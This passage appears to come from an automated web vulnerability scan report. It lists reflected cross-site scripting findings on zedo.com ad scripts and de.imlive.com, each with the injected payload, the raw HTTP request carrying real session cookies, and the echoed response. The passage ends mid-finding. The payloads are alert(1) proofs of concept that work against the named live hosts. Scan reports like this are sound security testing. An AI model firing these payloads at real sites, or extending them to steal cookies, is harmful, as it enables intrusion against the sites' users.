var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002;i=0;n=951d5bfe";8c2adbfec8b;s=2;" + zzStr;
function zzPop() { var zzAg = navigator.userAgent.toLowerCase(); var zzAOL = (zzAg.indexOf('aol') != -1); var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1); var zzNS7 = (zzAg.inde ...[SNIP]...
The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fce7"%3bcb35ad0aec6 was submitted in the REST URL parameter 11. This input was echoed as 1fce7";cb35ad0aec6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: application/x-javascript X-Varnish: 2859793634 Cache-Control: max-age=2592000 Expires: Mon, 28 Feb 2011 01:59:32 GMT Date: Sat, 29 Jan 2011 01:59:32 GMT Connection: close Content-Length: 4711
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd =='undefined'){var zzIdxTrd ='';} el ...[SNIP]... zIdxClk =''; } else { zzIdxClk = 'se=' + zzIdxClk;} if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }
var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002;i=0;n=951;s=21fce7";cb35ad0aec6;" + zzStr;
function zzPop() { var zzAg = navigator.userAgent.toLowerCase(); var zzAOL = (zzAg.indexOf('aol') != -1); var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1); var zzNS7 = (zzAg.indexOf( ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c895"%3bbb06c60bd90 was submitted in the REST URL parameter 4. This input was echoed as 8c895";bb06c60bd90 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: application/x-javascript X-Varnish: 2884309949 Cache-Control: max-age=2592000 Expires: Mon, 28 Feb 2011 01:59:24 GMT Date: Sat, 29 Jan 2011 01:59:24 GMT Connection: close Content-Length: 4711
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd =='undefined'){var zzIdxTrd ='';} el ...[SNIP]... 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; } else { zzIdxClk = 'se=' + zzIdxClk;} if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }
var zzLogData ="a=602889;x=38698c895";bb06c60bd90;g=172,0;c=951000002,951000002;i=0;n=951;s=2;" + zzStr;
function zzPop() { var zzAg = navigator.userAgent.toLowerCase(); var zzAOL = (zzAg.indexOf('aol') != -1); var zzNS6 = (zzAg.indexOf('netsca ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4c8"%3b53e86ebadaa was submitted in the REST URL parameter 5. This input was echoed as 2e4c8";53e86ebadaa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: application/x-javascript X-Varnish: 2884310509 Cache-Control: max-age=2592000 Expires: Mon, 28 Feb 2011 01:59:25 GMT Date: Sat, 29 Jan 2011 01:59:25 GMT Connection: close Content-Length: 4711
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd =='undefined'){var zzIdxTrd ='';} el ...[SNIP]... ined' || zzIdxClk.length == 0) { var zzIdxClk =''; } else { zzIdxClk = 'se=' + zzIdxClk;} if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }
var zzLogData ="a=602889;x=3869;g=1722e4c8";53e86ebadaa,0;c=951000002,951000002;i=0;n=951;s=2;" + zzStr;
function zzPop() { var zzAg = navigator.userAgent.toLowerCase(); var zzAOL = (zzAg.indexOf('aol') != -1); var zzNS6 = (zzAg.indexOf('netscape6/6. ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe8af"%3b54ceb3db781 was submitted in the REST URL parameter 6. This input was echoed as fe8af";54ceb3db781 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: application/x-javascript X-Varnish: 2859791972 Cache-Control: max-age=2592000 Expires: Mon, 28 Feb 2011 01:59:27 GMT Date: Sat, 29 Jan 2011 01:59:27 GMT Connection: close Content-Length: 4711
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd =='undefined'){var zzIdxTrd ='';} el ...[SNIP]... ed' || zzIdxClk.length == 0) { var zzIdxClk =''; } else { zzIdxClk = 'se=' + zzIdxClk;} if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }
var zzLogData ="a=602889;x=3869;g=172,0fe8af";54ceb3db781;c=951000002,951000002;i=0;n=951;s=2;" + zzStr;
function zzPop() { var zzAg = navigator.userAgent.toLowerCase(); var zzAOL = (zzAg.indexOf('aol') != -1); var zzNS6 = (zzAg.indexOf('netscape6/6.') ...[SNIP]...
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e4da"%3bd2aaaf873b8 was submitted in the REST URL parameter 7. This input was echoed as 4e4da";d2aaaf873b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: application/x-javascript X-Varnish: 2884311318 Cache-Control: max-age=2591965 Expires: Mon, 28 Feb 2011 01:58:53 GMT Date: Sat, 29 Jan 2011 01:59:28 GMT Connection: close Content-Length: 4711
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd =='undefined'){var zzIdxTrd ='';} el ...[SNIP]... Clk.length == 0) { var zzIdxClk =''; } else { zzIdxClk = 'se=' + zzIdxClk;} if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }
var zzLogData ="a=602889;x=3869;g=172,0;c=9510000024e4da";d2aaaf873b8,951000002;i=0;n=951;s=2;" + zzStr;
function zzPop() { var zzAg = navigator.userAgent.toLowerCase(); var zzAOL = (zzAg.indexOf('aol') != -1); var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1); va ...[SNIP]...
The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed1e4"%3b99b30bf642b was submitted in the REST URL parameter 8. This input was echoed as ed1e4";99b30bf642b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: application/x-javascript X-Varnish: 2859792649 Cache-Control: max-age=2592000 Expires: Mon, 28 Feb 2011 01:59:29 GMT Date: Sat, 29 Jan 2011 01:59:29 GMT Connection: close Content-Length: 4711
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd =='undefined'){var zzIdxTrd ='';} el ...[SNIP]... == 0) { var zzIdxClk =''; } else { zzIdxClk = 'se=' + zzIdxClk;} if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }
var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002ed1e4";99b30bf642b;i=0;n=951;s=2;" + zzStr;
function zzPop() { var zzAg = navigator.userAgent.toLowerCase(); var zzAOL = (zzAg.indexOf('aol') != -1); var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1); var zzNS7 = ...[SNIP]...
The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8690"%3b12f58dba9e6 was submitted in the REST URL parameter 9. This input was echoed as e8690";12f58dba9e6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: application/x-javascript X-Varnish: 2859792980 Cache-Control: max-age=2591961 Expires: Mon, 28 Feb 2011 01:58:51 GMT Date: Sat, 29 Jan 2011 01:59:30 GMT Connection: close Content-Length: 4711
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd =='undefined'){var zzIdxTrd ='';} el ...[SNIP]... 0) { var zzIdxClk =''; } else { zzIdxClk = 'se=' + zzIdxClk;} if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }
var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002;i=0e8690";12f58dba9e6;n=951;s=2;" + zzStr;
function zzPop() { var zzAg = navigator.userAgent.toLowerCase(); var zzAOL = (zzAg.indexOf('aol') != -1); var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1); var zzNS7 = (zzA ...[SNIP]...
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58993'%3balert(1)//9d587b5b16b was submitted in the $ parameter. This input was echoed as 58993';alert(1)//9d587b5b16b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791'$951:58993';alert(1)//9d587b5b16b;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:11 GMT;path=/;domain=.zedo.com; ETag: "19b436a-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=190 Expires: Sat, 29 Jan 2011 02:03:21 GMT Date: Sat, 29 Jan 2011 02:00:11 GMT Connection: close Content-Length: 2283
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat=',58993';alert(1)//9d587b5b16b';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,58993';alert(1)//9d587b5b16b;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea250"%3balert(1)//213da1d65d4 was submitted in the $ parameter. This input was echoed as ea250";alert(1)//213da1d65d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791'$951:ea250";alert(1)//213da1d65d4;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:08 GMT;path=/;domain=.zedo.com; ETag: "19b436a-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=193 Expires: Sat, 29 Jan 2011 02:03:21 GMT Date: Sat, 29 Jan 2011 02:00:08 GMT Connection: close Content-Length: 2283
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat=',ea250";alert(1)//213da1d65d4';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,ea250";alert(1)//213da1d65d4;z="+Math.random();}
4.273. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://d7.zedo.com
Path:
/bar/v16-401/d3/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c159a'-alert(1)-'63e58f5998c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c159a'-alert(1)-'63e58f5998c=1 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFad=32:15:42:23:13:18:2:1:1:0; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:29,26,1:21,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 964 Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:32:15:42:23:13:18:2:1:1:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "19b436a-82a5-4989a5927aac0" X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=261 Expires: Sat, 29 Jan 2011 05:30:36 GMT Date: Sat, 29 Jan 2011 05:26:15 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='None,4f791'';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=None,4f791';z ...[SNIP]...
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77514'%3balert(1)//51b4eb1c0b8 was submitted in the q parameter. This input was echoed as 77514';alert(1)//51b4eb1c0b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:00 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "19b436a-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=202 Expires: Sat, 29 Jan 2011 02:03:22 GMT Date: Sat, 29 Jan 2011 02:00:00 GMT Connection: close Content-Length: 2280
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='77514';alert(1)//51b4eb1c0b8';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=77514';alert(1)//51b4eb1c0b8;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e84a"%3balert(1)//8ca396aaf64 was submitted in the q parameter. This input was echoed as 3e84a";alert(1)//8ca396aaf64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 01:59:57 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "19b436a-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=205 Expires: Sat, 29 Jan 2011 02:03:22 GMT Date: Sat, 29 Jan 2011 01:59:57 GMT Connection: close Content-Length: 2280
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='3e84a";alert(1)//8ca396aaf64';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=3e84a";alert(1)//8ca396aaf64;z="+Math.random();}
4.276. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d94"><script>alert(1)</script>9f278dc55b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?23d94"><script>alert(1)</script>9f278dc55b9=1 HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||23d94"><script>alert(1)</script>9f278dc55b9~1');return false;"> ...[SNIP]...
4.277. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 621b5'-alert(1)-'46747e803cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?621b5'-alert(1)-'46747e803cf=1 HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12af"><script>alert(1)</script>f4d60ab8f81 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee4f7"><script>alert(1)</script>0f4356d3bc3 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
